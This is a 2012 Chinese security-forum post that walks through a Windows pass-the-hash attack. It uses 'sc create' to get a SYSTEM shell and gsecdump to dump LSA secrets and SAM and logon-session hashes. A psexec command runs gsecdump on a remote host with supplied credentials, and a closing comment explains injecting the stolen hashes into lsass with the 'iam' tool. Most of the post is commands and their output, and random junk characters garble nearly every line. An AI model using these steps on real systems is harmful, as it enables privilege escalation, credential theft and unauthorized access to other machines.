找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2069|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:) G& W0 q* ], {. [: t8 m
0 [( E2 L+ N9 y9 U2 r# V
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact& W5 ?& x( [. B4 ?
[SC] CreateService SUCCESS
: K  m: Z/ p/ F$ k: i' B+ V( Z3 y) j2 X! C
C:\>sc start shellcmdline
& d& s3 e4 [$ Y0 D- Z1 L( z2 O[SC] StartService FAILED 1053:- D3 T: i! y2 w( I
0 O$ x/ ]" \  v
The service did not respond to the start or control request in a timely fashion.
% e- K0 V4 [: S  E/ K* l! ?8 l" y
C:\>sc delete shellcmdline. |4 ?: g" k! y( ^. n
[SC] DeleteService SUCCESS, q1 C) K/ y1 T
, C# v3 k# d  J& }+ K' t( `
------------
2 X3 C% C0 u! g& |% f# T0 R0 q, K3 H$ b: h$ I
Then in the new DOS window:
0 A' b7 O, S# p* l6 h3 ]0 Z5 X
. J& P2 Y9 y7 |" {Microsoft Windows XP [Version 5.1.2600]
' X0 c# O7 u  I* \9 M5 |* ~(C) Copyright 1985-2001 Microsoft Corp." Y6 |* N8 }3 V

4 k0 Q& \, ?. }2 c. w" bC:\WINDOWS\system32>whoami  z" }7 ]  W. I6 X
NT AUTHORITY\SYSTEM
4 _" `2 ]% W+ U  q3 V  e1 Z# {/ }7 `9 @* g2 {2 _) p
C:\WINDOWS\system32>gsecdump -h: U6 r* j& {" B0 \) I
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)- A, Z$ X3 x1 q5 e2 x
usage: gsecdump [options]
% a5 T: p0 y) M! `  T1 [; h3 a3 R0 R* A
options:
( e* e: b4 M. {-h [ --help ] show help2 @  v4 H' V# X+ E: u) H0 I
-a [ --dump_all ] dump all secrets# ~% C" k. l' H$ r" J, N0 W8 b
-l [ --dump_lsa ] dump lsa secrets0 V4 f* V5 @- c* k. J
-w [ --dump_wireless ] dump microsoft wireless connections/ T% ?5 N& b  R. t
-u [ --dump_usedhashes ] dump hashes from active logon sessions3 I0 V% G- D4 e+ c1 G
-s [ --dump_hashes ] dump hashes from SAM/AD
  P0 L+ h1 j# {# Y3 J. I( {, ~, Q: ]( t2 S0 ^. n
Although I like to use:
2 w2 A$ s6 ?- Y" i! Q2 o
9 f2 L" \5 F7 p2 UPsExec v1.83 - Execute processes remotely
9 k( F/ B* `  ~Copyright (C) 2001-2007 Mark Russinovich
# w. b1 h* ~0 r( o" fSysinternals - 链接标记[url]www.sysinternals.com[/url]
/ {* @* a/ Z$ w  m  h* N3 I+ Y$ E2 W3 M- V# _
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
# R  T( f* d3 V: N6 }+ u
! u8 j: N8 b! _- K' q. Vto get the hashes from active logon sessions of a remote system.( q( ?2 n2 [+ u- O" l# V( S

$ z% |3 o4 o; O$ K: a- mThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
8 B( W9 v1 p2 J9 Y% e- i/ G0 g. k. u' [2 S
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.& Q) K4 B/ q& Y0 E# j' t1 Z
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]: t( d, M9 T! j2 V7 i- a
; M( R1 Z, S6 I6 u+ G) Z2 n/ X. T
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
! q# j- B8 A5 H+ e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表